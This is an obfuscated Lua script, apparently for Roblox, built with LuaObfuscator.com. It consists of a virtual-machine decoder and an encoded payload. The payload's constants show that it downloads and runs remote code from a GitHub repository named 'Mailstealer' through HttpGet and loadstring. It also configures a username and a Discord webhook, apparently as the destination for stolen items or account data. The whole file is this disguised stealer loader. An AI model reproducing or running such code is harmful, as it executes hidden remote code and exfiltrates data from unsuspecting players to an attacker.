--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v98=0;local v99;while true do if (v98==1) then return v99;end if (v98==0) then v99=v5(v82,v19);v19=nil;v98=1;end end else return v82;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v83=(0 + 0) -0 ;local v84;while true do if (v83==0) then v84=(v31/((879 -(282 + 595))^(v32-(2 -1))))%((2 + 0)^(((v33-(1 -0)) -(v32-(2 -(958 -(892 + 65))))) + (620 -(555 + 64)))) ;return v84-(v84%(4 -3)) ;end end else local v85=(933 -(857 + 74))^(v32-(569 -(367 + (479 -278)))) ;return (((v31%(v85 + v85))>=v85) and (928 -((395 -181) + 713))) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;return (v36 * (436 -(67 + 113))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (9 -5) ;return (v40 * (12338840 + 4438376)) + (v39 * 65536) + (v38 * 256) + v37 ;end local function v24()local v41=0 -0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==1) then v44=953 -(802 + 150) ;v45=(v20(v43,431 -(44 + 386) ,20) * ((5 -3)^((1543 -(998 + 488)) -(8 + 17)))) + v42 ;v41=2 + 0 ;end if (v41==((819 + 181) -(915 + 82))) then if (v46==(0 -(772 -(201 + 571)))) then if (v45==(0 + 0)) then return v47 * (0 -0) ;else v46=(2326 -(116 + 1022)) -(1069 + 118) ;v44=0 -0 ;end elseif (v46==2047) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/0))) or (v47 * NaN) ;end return v8(v47,v46-(1817 -794) ) * (v44 + (v45/((2 + (0 -0))^52))) ;end if (v41==(791 -(368 + 423))) then v42=v23();v43=v23();v41=1;end if (v41==(6 -(3 + 1))) then v46=v20(v43,39 -((36 -26) + 8) ,119 -88 );v47=((v20(v43,474 -(416 + 26) )==(3 -(7 -5))) and  -(1 + (859 -(814 + 45)))) or (1 -0) ;v41=441 -(145 + 293) ;end end end local function v25(v48)local v49=1423 -(630 + 793) ;local v50;local v51;while true do if (v49==(4 -(768 -(745 + 21)))) then v51={};for v88=1 + 0 + 0 , #v50 do v51[v88]=v2(v1(v3(v50,v88,v88)));end v49=2 + 1 ;end if (v49==(885 -(261 + 624))) then v50=nil;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=1;end if (v49==(1 + 0)) then v50=v3(v16,v18,(v18 + v48) -(1081 -(1020 + 60)) );v18=v18 + v48 ;v49=(4812 -3063) -((2981 -2221) + 987) ;end if (v49==(1916 -(1789 + 124))) then return v6(v51);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(1275 -(388 + 886))) then v55=nil;v56=nil;v52=2 -0 ;end if (v52==4) then while true do if (v53~=3) then else v60=nil;while true do local v100=0;while true do if (v100==(0 + 0)) then if (v54==0) then local v109=0;while true do if (v109==(560 -(306 + 254))) then v55={};v56={};v109=1;end if (v109~=(1 + 1)) then else v54=1 -0 ;break;end if (v109~=(1468 -(899 + 568))) then else v57={};v58={v55,v56,nil,v57};v109=2;end end end if (v54~=(291 -(60 + 230))) then else local v110=572 -(426 + 146) ;local v111;while true do if ((0 + 0)~=v110) then else v111=1456 -(282 + 1174) ;while true do if (v111~=(812 -(569 + 242))) then else local v164=0;while true do if (v164==(2 -1)) then v111=1 + 1 ;break;end if (v164==(1024 -(706 + 318))) then for v175=1252 -(721 + 530) ,v59 do local v176=0;local v177;local v178;local v179;local v180;local v181;while true do if (v176==(1272 -(945 + 326))) then v179=nil;v180=nil;v176=4 -2 ;end if (v176==2) then v181=nil;while true do if (v177==2) then while true do if (v178~=1) then else v181=nil;while true do if (v179~=1) then else if (v180==(1 + 0)) then v181=v21()~=0 ;elseif (v180==(702 -(271 + 429))) then v181=v24();elseif (v180==3) then v181=v25();end v60[v175]=v181;break;end if ((0 + 0)==v179) then local v191=1500 -(1408 + 92) ;local v192;while true do if (v191==0) then v192=1086 -(461 + 625) ;while true do if (v192==0) then local v199=0;while true do if ((1288 -(993 + 295))~=v199) then else v180=v21();v181=nil;v199=1;end if (v199==1) then v192=1 + 0 ;break;end end end if ((1172 -(418 + 753))~=v192) then else v179=1;break;end end break;end end end end break;end if (0==v178) then local v189=0;while true do if (v189==1) then v178=1 + 0 ;break;end if (0==v189) then local v193=0;while true do if (v193==(0 + 0)) then v179=0 + 0 ;v180=nil;v193=1;end if (v193~=(1 + 0)) then else v189=530 -(406 + 123) ;break;end end end end end end break;end if (v177~=1) then else local v182=1769 -(1749 + 20) ;while true do if ((1 + 0)==v182) then v177=2;break;end if (v182==(1322 -(1249 + 73))) then v180=nil;v181=nil;v182=1;end end end if (v177==(0 + 0)) then v178=1145 -(466 + 679) ;v179=nil;v177=2 -1 ;end end break;end if (0==v176) then v177=0;v178=nil;v176=1;end end end v58[3]=v21();v164=2 -1 ;end end end if (v111==(1900 -(106 + 1794))) then v59=v23();v60={};v111=1;end if (v111==2) then v54=1 + 1 ;break;end end break;end end end v100=1;end if (v100==1) then if (v54==(1 + 1)) then local v112=0;while true do if (1==v112) then return v58;end if (v112==0) then local v145=0 -0 ;while true do if ((2 -1)~=v145) then else v112=1;break;end if (v145==0) then for v167=115 -(4 + 110) ,v23() do local v168=0;local v169;local v170;local v171;while true do if (v168~=0) then else v169=0;v170=nil;v168=585 -(57 + 527) ;end if ((1428 -(41 + 1386))==v168) then v171=nil;while true do if ((104 -(17 + 86))~=v169) then else while true do if (v170==(0 + 0)) then v171=v21();if (v20(v171,1 -0 ,2 -1 )==0) then local v183=166 -(122 + 44) ;local v184;local v185;local v186;local v187;local v188;while true do if (v183==0) then v184=0 -0 ;v185=nil;v183=1;end if (1==v183) then v186=nil;v187=nil;v183=2;end if (v183~=2) then else v188=nil;while true do if (2==v184) then while true do if (v185~=(3 -2)) then else local v196=0;local v197;while true do if (v196==0) then v197=0 + 0 ;while true do if (v197==1) then v185=2;break;end if (v197==0) then v188={v22(),v22(),nil,nil};if (v186==0) then local v206=0;local v207;local v208;while true do if (v206~=(1 + 0)) then else while true do if ((1257 -(1043 + 214))==v207) then v208=0;while true do if (v208==0) then v188[11 -8 ]=v22();v188[4]=v22();break;end end break;end end break;end if (v206==0) then v207=0;v208=nil;v206=1213 -(323 + 889) ;end end elseif (v186==1) then v188[3]=v23();elseif (v186==(5 -3)) then v188[3]=v23() -((582 -(361 + 219))^16) ;elseif (v186==3) then local v211=0;local v212;while true do if ((320 -(53 + 267))~=v211) then else v212=0;while true do if (v212~=0) then else v188[1 + 2 ]=v23() -((415 -(15 + 398))^(998 -(18 + 964))) ;v188[4]=v22();break;end end break;end end end v197=1;end end break;end end end if (v185==(7 -5)) then if (v20(v187,1,1)~=1) then else v188[2 + 0 ]=v60[v188[2]];end if (v20(v187,2,2 + 0 )~=1) then else v188[3]=v60[v188[3]];end v185=853 -(20 + 830) ;end if (0==v185) then v186=v20(v171,2 + 0 ,3);v187=v20(v171,130 -(116 + 10) ,1 + 5 );v185=1;end if (v185==(741 -(542 + 196))) then if (v20(v187,6 -3 ,1 + 2 )~=1) then else v188[4]=v60[v188[4]];end v55[v167]=v188;break;end end break;end if ((1 + 0)~=v184) then else local v194=0 + 0 ;while true do if (v194==0) then v187=nil;v188=nil;v194=2 -1 ;end if (v194==1) then v184=2;break;end end end if (v184~=(0 -0)) then else local v195=0;while true do if (v195==(1552 -(1126 + 425))) then v184=1;break;end if (v195~=0) then else v185=0;v186=nil;v195=406 -(118 + 287) ;end end end end break;end end end break;end end break;end if (v169==(0 -0)) then v170=0;v171=nil;v169=1122 -(118 + 1003) ;end end break;end end end for v172=1,v23() do v56[v172-1 ]=v28();end v145=1;end end end end end break;end end end break;end if (v53~=(5 -3)) then else local v96=377 -(142 + 235) ;while true do if (v96~=1) then else v53=3;break;end if (v96==0) then v58=nil;v59=nil;v96=4 -3 ;end end end if (v53==(0 + 0)) then local v97=0;while true do if (v97~=0) then else v54=0;v55=nil;v97=978 -(553 + 424) ;end if (v97==(1 -0)) then v53=1;break;end end end if (v53~=(1 + 0)) then else v56=nil;v57=nil;v53=2 + 0 ;end end break;end if (v52~=0) then else v53=0;v54=nil;v52=1 + 0 ;end if (v52==3) then v59=nil;v60=nil;v52=2 + 2 ;end if (v52==(2 + 0)) then v57=nil;v58=nil;v52=6 -3 ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v87=0;while true do if (v87==1) then if (v80<=5) then if (v80<=2) then if (v80<=0) then do return;end elseif (v80>1) then v71=v79[3];else v77[v79[2]]=v63[v79[3]];end elseif (v80<=3) then local v101=0;local v102;local v103;while true do if (v101==0) then v102=v79[2];v103=v77[v79[3]];v101=1;end if (v101==1) then v77[v102 + 1 ]=v103;v77[v102]=v103[v79[4]];break;end end elseif (v80>4) then local v116=0;while true do if (v116==0) then v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v116=1;end if (v116==3) then v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v116=4;end if (v116==4) then v71=v79[3];break;end if (v116==1) then v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v116=2;end if (v116==2) then v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v116=3;end end else v63[v79[3]]=v77[v79[2]];end elseif (v80<=8) then if (v80<=6) then v77[v79[2]]();elseif (v80>7) then local v119;local v120,v121;local v122;local v123;v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v123=v79[2];v122=v77[v79[3]];v77[v123 + 1 ]=v122;v77[v123]=v122[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v123=v79[2];v120,v121=v70(v77[v123](v13(v77,v123 + 1 ,v79[3])));v72=(v121 + v123) -1 ;v119=0;for v142=v123,v72 do local v143=0;while true do if (v143==0) then v119=v119 + 1 ;v77[v142]=v120[v119];break;end end end v71=v71 + 1 ;v79=v67[v71];v123=v79[2];v77[v123]=v77[v123](v13(v77,v123 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];v71=v79[3];else v77[v79[2]]=v79[3];end elseif (v80<=9) then local v104=0;local v105;local v106;local v107;local v108;while true do if (v104==2) then for v146=v105,v72 do local v147=0;while true do if (v147==0) then v108=v108 + 1 ;v77[v146]=v106[v108];break;end end end break;end if (v104==0) then v105=v79[2];v106,v107=v70(v77[v105](v13(v77,v105 + 1 ,v79[3])));v104=1;end if (v104==1) then v72=(v107 + v105) -1 ;v108=0;v104=2;end end elseif (v80>10) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else local v135=v79[2];v77[v135]=v77[v135](v13(v77,v135 + 1 ,v72));end v71=v71 + 1 ;break;end if (0==v87) then v79=v67[v71];v80=v79[1];v87=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203083O003953485749574845030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C65722F6D61696E2F656E67696E6503083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3130372O3233373438313532363832393037362F677A4554524B75575F572D634F78377A3564556D6F3268664B4C422D6C74367771385267456B304761757265344A576C496450683343666A766C7442766A68316434684D00163O0012073O00013O00260B3O000D000100020004023O000D0001001207000100043O001208000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O0015000100260B3O0001000100010004023O00010001001207000100043O001205000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100016O00017O00",v9(),...);
